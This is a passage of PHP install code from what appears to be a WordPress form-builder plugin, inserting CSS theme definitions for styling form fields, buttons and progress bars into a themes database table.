#000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: rgb(158, 0, 0);\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 4px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #3F3927;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 30px 0px 30px;\r\n	font-weight: bold;\r\n}\r\n.page_deactive:nth-child(even) {\r\n	background-color: #DCDADB;\r\n}\r\n.page_deactive:nth-child(odd) {\r\n	background-color: #D1CDCE;\r\n}\r\n.page_active {\r\n	color: #FFF;\r\n	cursor: pointer;\r\n	background-color: #5C00DA;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 18px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 17px;\r\n	line-height: 17px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #5C00DA ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #5C00DA 0%, #5C00DB 49%, #6600F0 84%, #7917FF 99%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #5C00DA ), color-stop(49%, #5C00DB ), color-stop(84%, #6600F0 ), color-stop(99%, #7917FF )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #5C00DA 0%, #5C00DB 49%, #6600F0 84%, #7917FF 99%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #5C00DA 0%, #5C00DB 49%, #6600F0 84%, #7917FF 99%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #5C00DA 0%, #5C00DB 49%, #6600F0 84%, #7917FF 99%); /* IE10+ */\r\n	background: linear-gradient(to right, #5C00DA 0%, #5C00DB 49%, #6600F0 84%, #7917FF 99%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 17px;\r\n	line-height: 17px;\r\n	background-color: #D9D7D8;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: -2px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #fff;\r\n	font-weight: bold;\r\nfont-size:13px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 17px;\r\n	height: 17px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`id`, `title`, `css`, `default`) VALUES(8, \'Theme 02 transparent (aquamarine button)\', \'.radio-div input[type="radio"],\r\n.checkbox-div input[type="checkbox"]\r\n{\r\nvisibility: hidden;\r\n}\r\n.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #EAF9F3;\r\nborder: 1px solid #4D4A58;\r\nmargin-bottom: 10px;\r\ncolor: #4D4A58;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.ui-slider-range {\r\n	background: #A4A4A4 !important;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -8px !important;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/02/bg.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #CEECE2 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #CEECE2 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #CEECE2 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #CEECE2 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #CEECE2 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #CEECE2 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #CEECE2 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-slider {\r\n	background: #fff !important;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 4px;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 22px;\r\n	width: 29px;\r\n	background: url([SITE_ROOT]/images/02/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/02/02/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #4D4A3C;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 33px;\r\n	background: url([SITE_ROOT]/images/02/next.png) top right #94FFD5;\r\n	padding: 0px 30px 0 15px;\r\n	vertical-align: middle;\r\n	font-weight: 600;\r\n	font-size: 16px;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/02/next.png) top right  #E4F3E2;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #4D4A3C;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background: url([SITE_ROOT]/images/02/previous.png) top left #94FFD5;\r\n	padding: 0px 15px 0 30px;\r\n	vertical-align: middle;\r\n	font-weight: 600;\r\n	font-size: 16px;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/02/previous.png) top left  #E4F3E2;\r\n}\r\n.button-submit {\r\n	background: url([SITE_ROOT]/images/02/bg.png) #94FFD5;\r\n	cursor: pointer;\r\n	font-size: 16px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #4D4A3C;\r\n	margin: 5px;\r\n	border: 0px;\r\n	font-family: Segoe UI;\r\n	font-weight: 600;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: transparent;\r\n	padding: 15px 15px 15px 50px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 1px solid #CFCFCF;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/02/bg.png) #CFAB1A;\r\n	text-align: left;\r\n	padding: 10px;\r\n	border-radius: 0px;\r\n	-moz-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	width: 466px;\r\n	text-align: center;\r\nfont-size: 18px;\r\nfont-family: Segoe UI;\r\ncolor: #292929;\r\nfont-weight: 600;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\nmargin: 16px 10px 16px 0px;\r\ntext-align: left;\r\nfont-size: 18px;\r\nfont-family: Segoe UI;\r\ncolor: #292929;\r\n}\r\n.wdform_section {\r\n	display: table-row\r\n}\r\nselect {\r\n	border-radius: 4px;\r\n	height: 26px;\r\n	overflow: hidden;\r\n	border: 0px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\nbackground: #E9E9E9;\r\n}\r\ninput[type="text"] {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\nbackground: #E9E9E9;\r\n}\r\ninput[type="password"] {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\nbackground: #E9E9E9;\r\n}\r\ntextarea {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\nbackground: #E9E9E9;\r\n}\r\ninput[type="text"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/02/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/02/02/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 11px;\r\n	height: 10px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 1px;\r\n	left: 1px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: rgb(158, 0, 0);\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 4px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #3F3927;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 30px 0px 30px;\r\n	font-weight: bold;\r\n}\r\n.page_deactive:nth-child(even) {\r\n	background-color: #EEEEEE;\r\n}\r\n.page_deactive:nth-child(odd) {\r\n	background-color: #EEEEEE;\r\n}\r\n.page_active {\r\n	color: #3F3927;\r\n	cursor: pointer;\r\n	background-color: #CEECE2;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 18px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 17px;\r\n	line-height: 17px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #95D3BE ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #80CEB4 0%, #95D6C1 49%, #95D3BE 84%, #B3E7D6 99%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #80CEB4 ), color-stop(49%, #95D6C1 ), color-stop(84%, #95D3BE ), color-stop(99%, #B3E7D6 )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #80CEB4 0%, #95D6C1 49%, #95D3BE 84%, #B3E7D6 99%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #80CEB4 0%, #95D6C1 49%, #95D3BE 84%, #B3E7D6 99%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #80CEB4 0%, #95D6C1 49%, #95D3BE 84%, #B3E7D6 99%); /* IE10+ */\r\n	background: linear-gradient(to right, #80CEB4 0%, #95D6C1 49%, #95D3BE 84%, #B3E7D6 99%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 17px;\r\n	line-height: 17px;\r\n	background-color: #E0DFE0;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: -2px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #292929;\r\n	font-weight: bold;\r\nfont-size:13px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 17px;\r\n	height: 17px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`id`, `title`, `css`, `default`) VALUES(9, \'Theme 03 green\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EEEF;\r\nborder: 1px solid #3A620A;\r\nmargin-bottom: 10px;\r\ncolor: #3A620A;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 0px;\r\n	border: 1px solid #39680B;\r\n	background: #C9FD9C;\r\n	height: 13px;\r\n	width: 13px;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -5px !important;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover {\r\n	background: #4A8C08!important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active {\r\n	background: #4A8C08!important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus {\r\n	background: #4A8C08!important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover {\r\n	background: #4A8C08!important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active {\r\n	background: #4A8C08!important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus {\r\n	background: #4A8C08!important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #4A8C08!important;\r\n	color: #fff;\r\n}\r\n.ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header 